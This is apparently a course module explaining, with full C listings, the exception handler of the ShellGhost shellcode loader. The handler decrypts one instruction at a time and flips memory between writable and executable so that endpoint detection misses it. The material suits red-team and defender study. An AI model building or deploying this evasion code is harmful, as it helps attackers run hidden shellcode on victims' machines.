Module 6: The VEH Handler Implementation
Line by line through the exception handler that re-encrypts, decrypts, toggles RW/RX, and advances one instruction at a time.
Module Objective
Walk through the actual VEH handler implementation in detail. This module covers how the handler reads ContextRecord->Rip (already adjusted by the kernel) to identify the current position, re-encrypts the previous instruction, decrypts the current instruction using SystemFunction032, toggles memory protection between RW and RX via VirtualProtect, and resumes execution. All within a single EXCEPTION_BREAKPOINT handler — no trap flag, no EXCEPTION_SINGLE_STEP. Every line of the handler is explained.
1. Global State Recap
The VEH handler relies on global state that was initialized before execution began. Here is the complete state structure:
C// Global state accessible by the VEH handler
static struct {
PBYTE exec_base; // Base address of RW execution buffer
SIZE_T exec_size; // Size of execution buffer
PBYTE enc_shellcode; // Per-instruction encrypted shellcode
SIZE_T sc_size; // Shellcode size
// Instruction mapping (from ShellGhost_mapping.py)
CRYPT_BYTES_QUOTA *map; // Array of per-instruction RVA + byte count
DWORD num_instr; // Total number of instructions
DWORD current_index; // Current instruction index
// RC4 key for SystemFunction032
BYTE key[16]; // RC4 encryption key
USHORT key_len; // Key length
// Tracking state
INT prev_index; // Index of previously executed instruction (-1 if none)
// SystemFunction032 function pointer
_SystemFunction032 pSystemFunction032;
} g_ctx;
2. Handling EXCEPTION_BREAKPOINT
When the CPU hits a 0xCC byte in the execution buffer, the handler must: validate the exception, re-encrypt the previous instruction, decrypt the current instruction, toggle memory protection, and resume. All in a single handler invocation.
CLONG CALLBACK GhostVehHandler(PEXCEPTION_POINTERS ep) {
PEXCEPTION_RECORD rec = ep->ExceptionRecord;
PCONTEXT ctx = ep->ContextRecord;
// ---- BREAKPOINT HANDLING ----
if (rec->ExceptionCode == EXCEPTION_BREAKPOINT) {
DWORD old_protect;
// Step 1: Get the address of the 0xCC byte.
// The kernel (KiDispatchException) already decremented RIP by 1,
// so ContextRecord->Rip points directly at the 0xCC byte.
PBYTE cc_addr = (PBYTE)ctx->Rip;
// Step 2: Validate - is this 0xCC in our execution buffer?
if (cc_addr < g_ctx.exec_base ||
cc_addr >= g_ctx.exec_base + g_ctx.exec_size) {
return EXCEPTION_CONTINUE_SEARCH; // Not ours
}
// Step 3: Toggle memory to RW for writing
VirtualProtect(g_ctx.exec_base, g_ctx.exec_size,
PAGE_READWRITE, &old_protect);
// Step 4: Re-encrypt the PREVIOUS instruction (if any)
if (g_ctx.prev_index >= 0) {
CRYPT_BYTES_QUOTA *prev = &g_ctx.map[g_ctx.prev_index];
// Write 0xCC back over previous instruction's bytes
memset(g_ctx.exec_base + prev->rva, 0xCC, prev->quota);
}
// Step 5: Decrypt the CURRENT instruction
CRYPT_BYTES_QUOTA *curr = &g_ctx.map[g_ctx.current_index];
// Copy encrypted bytes to execution buffer
memcpy(g_ctx.exec_base + curr->rva,
g_ctx.enc_shellcode + curr->rva, curr->quota);
// Decrypt in place using SystemFunction032 (RC4)
UNICODE_STRING data = {
curr->quota, curr->quota,
(PWSTR)(g_ctx.exec_base + curr->rva) };
UNICODE_STRING key = {
g_ctx.key_len, g_ctx.key_len,
(PWSTR)g_ctx.key };
g_ctx.pSystemFunction032(&data, &key);
// Step 6: Toggle memory to RX for execution
VirtualProtect(g_ctx.exec_base, g_ctx.exec_size,
PAGE_EXECUTE_READ, &old_protect);
// Step 7: Update tracking state
g_ctx.prev_index = g_ctx.current_index;
g_ctx.current_index++;
// Rip already points to the decrypted instruction
return EXCEPTION_CONTINUE_EXECUTION;
}
// Not our exception
return EXCEPTION_CONTINUE_SEARCH;
}
Step-by-Step Breakdown
| Step | Operation | Why |
|---|---|---|
| 1 | cc_addr = ctx->Rip | The kernel already decremented RIP by 1 for EXCEPTION_BREAKPOINT. No manual adjustment needed. |
| 2 | Range check against exec_base | Ensures we only process breakpoints from our shellcode buffer, not from debuggers or other code. |
| 3 | VirtualProtect to RW | The page is currently RX (executable). We need RW to write decrypted bytes. |
| 4 | Re-encrypt previous instruction | Writes 0xCC back over the bytes of the previously executed instruction, restoring the "ghost" state. |
| 5 | Decrypt current instruction via SystemFunction032 | Copies encrypted bytes from the data buffer and decrypts them in place using RC4. |
| 6 | VirtualProtect to RX | Toggles the page back to executable (RX) so the CPU can run the decrypted instruction. Avoids the RWX IoC. |
| 7 | Update tracking indices | Records the current instruction as "previous" for the next handler invocation. Advances to the next instruction index. |
3. The One-Exception Model
ShellGhost uses a one-exception-per-instruction model. There is no trap flag usage and no EXCEPTION_SINGLE_STEP handling. The key insight is that after executing a decrypted instruction, the CPU naturally hits the next 0xCC byte in the buffer, which triggers another EXCEPTION_BREAKPOINT. The handler for that next breakpoint re-encrypts the previous instruction before decrypting the current one.
Why No Trap Flag?
Many assume ShellGhost needs the trap flag (TF) to know when an instruction finishes executing. In reality, the 0xCC-filled buffer already provides this signal naturally. When the CPU finishes executing the decrypted instruction and advances to the next byte, it finds another 0xCC and raises EXCEPTION_BREAKPOINT. This breakpoint is the signal that the previous instruction has completed. No trap flag, no EXCEPTION_SINGLE_STEP — just a clean sequence of EXCEPTION_BREAKPOINT events, one per instruction.
Advantage: Simpler and Stealthier
By avoiding the trap flag entirely, ShellGhost avoids several detection vectors that would otherwise apply: hardware performance counters monitoring single-step exceptions, EXCEPTION_SINGLE_STEP event monitoring, and the doubled exception rate that a two-exception model would produce. The one-exception model generates half the exceptions compared to a breakpoint+single-step approach.
4. The RIP Adjustment Explained
A common misconception is that the VEH handler must manually subtract 1 from RIP for EXCEPTION_BREAKPOINT. Here is the actual behavior:
TextBefore INT3 executes:
Memory: [0xCC] [0xCC] [0xCC] ...
RIP: 0x1000 (pointing at the first 0xCC)
CPU executes 0xCC (INT3):
CPU internally advances RIP to 0x1001 (past the 1-byte INT3)
Traps to kernel via IDT vector 3
Kernel (KiDispatchException):
For EXCEPTION_BREAKPOINT specifically, the kernel decrements RIP by 1
RIP is set back to 0x1000 before dispatching to user-mode
VEH handler receives:
ContextRecord->Rip = 0x1000 (already adjusted by kernel)
ExceptionAddress = 0x1000 (points to the 0xCC)
No manual RIP adjustment needed!
VEH handler:
Decrypts instruction at 0x1000 (e.g., "48 89 E5" = mov rbp, rsp)
Toggles to RX, returns EXCEPTION_CONTINUE_EXECUTION
CPU resumes at RIP = 0x1000:
Memory: [0x48] [0x89] [0xE5] [0xCC] ...
Executes "mov rbp, rsp" (3 bytes), advances RIP to 0x1003
Hits 0xCC at 0x1003 -> next EXCEPTION_BREAKPOINT
The Kernel Does the Work
This kernel-level RIP adjustment is specific to EXCEPTION_BREAKPOINT (0x80000003). The Windows kernel (KiDispatchException) decrements the saved RIP by 1 before dispatching the exception to user-mode handlers. This is a well-known Windows kernel behavior that debuggers rely on. ShellGhost uses ContextRecord->Rip directly, without any subtraction.
5. Per-Instruction Decryption via CRYPT_BYTES_QUOTA
ShellGhost knows exactly how many bytes each instruction occupies because this information was pre-computed by ShellGhost_mapping.py. The handler uses the CRYPT_BYTES_QUOTA struct to decrypt precisely the right number of bytes:
C// Decrypt the current instruction using mapping data
CRYPT_BYTES_QUOTA *curr = &g_ctx.map[g_ctx.current_index];
// Copy encrypted bytes from data buffer to execution buffer
memcpy(g_ctx.exec_base + curr->rva,
g_ctx.enc_shellcode + curr->rva,
curr->quota);
// Decrypt in place using SystemFunction032
UNICODE_STRING data_str = {
(USHORT)curr->quota,
(USHORT)curr->quota,
(PWSTR)(g_ctx.exec_base + curr->rva)
};
UNICODE_STRING key_str = {
g_ctx.key_len, g_ctx.key_len,
(PWSTR)g_ctx.key
};
g_ctx.pSystemFunction032(&data_str, &key_str);
// The exact bytes of this instruction are now decrypted in place
// The handler knows the exact byte count from curr->quota
Precise Decryption Surface
Because the CRYPT_BYTES_QUOTA struct records the exact byte count of each instruction, ShellGhost decrypts exactly the number of bytes needed — no more, no less. The decryption surface at any instant is exactly one instruction (1–15 bytes). After the instruction executes and the next breakpoint handler runs, those bytes are overwritten with 0xCC.
6. API Calls from Shellcode
When the shellcode calls a Windows API (e.g., call [rax] where rax points to a function in kernel32.dll), execution leaves the execution buffer. The handler must account for this:
When the shellcode calls a Windows API (e.g., call [rax] where rax points to a function in kernel32.dll), execution leaves the execution buffer. The API executes at full native speed. When the API returns (via ret), execution returns to the shellcode buffer at the next instruction. That byte is 0xCC, so EXCEPTION_BREAKPOINT fires again and the cycle resumes naturally.
API Calls Are Free
Because ShellGhost uses only EXCEPTION_BREAKPOINT (no trap flag), API calls outside the execution buffer run at full native speed without any exception overhead. The cycle resumes automatically when the API returns and the CPU hits the next 0xCC in the buffer. This is a significant advantage over a trap-flag-based approach, which would generate single-step exceptions through the entire API call chain.
7. Complete Handler Assembly
CLONG CALLBACK ShellGhostHandler(PEXCEPTION_POINTERS ep) {
PEXCEPTION_RECORD rec = ep->ExceptionRecord;
PCONTEXT ctx = ep->ContextRecord;
DWORD old_protect;
// ======= BREAKPOINT: Re-encrypt prev, decrypt current =======
if (rec->ExceptionCode == EXCEPTION_BREAKPOINT) {
// Rip already points at the 0xCC (kernel adjusted)
PBYTE cc_addr = (PBYTE)ctx->Rip;
// Boundary check
if (cc_addr < g_ctx.exec_base ||
cc_addr >= g_ctx.exec_base + g_ctx.exec_size)
return EXCEPTION_CONTINUE_SEARCH;
// Toggle to RW for writing
VirtualProtect(g_ctx.exec_base, g_ctx.exec_size,
PAGE_READWRITE, &old_protect);
// Re-encrypt previously executed instruction
if (g_ctx.prev_index >= 0) {
CRYPT_BYTES_QUOTA *prev = &g_ctx.map[g_ctx.prev_index];
memset(g_ctx.exec_base + prev->rva, 0xCC, prev->quota);
}
// Decrypt current instruction via SystemFunction032
CRYPT_BYTES_QUOTA *curr = &g_ctx.map[g_ctx.current_index];
memcpy(g_ctx.exec_base + curr->rva,
g_ctx.enc_shellcode + curr->rva, curr->quota);
UNICODE_STRING data = {
(USHORT)curr->quota, (USHORT)curr->quota,
(PWSTR)(g_ctx.exec_base + curr->rva) };
UNICODE_STRING key = {
g_ctx.key_len, g_ctx.key_len,
(PWSTR)g_ctx.key };
g_ctx.pSystemFunction032(&data, &key);
// Toggle to RX for execution
VirtualProtect(g_ctx.exec_base, g_ctx.exec_size,
PAGE_EXECUTE_READ, &old_protect);
// Advance instruction index
g_ctx.prev_index = g_ctx.current_index;
g_ctx.current_index++;
// Rip already correct, resume execution
return EXCEPTION_CONTINUE_EXECUTION;
}
return EXCEPTION_CONTINUE_SEARCH;
}
Knowledge Check
Q1: Why does the ShellGhost handler NOT subtract 1 from ContextRecord->Rip?
Q2: How does ShellGhost avoid the RWX memory indicator of compromise (IoC)?
Q3: What happens when the shellcode calls a Windows API that lives outside the execution buffer?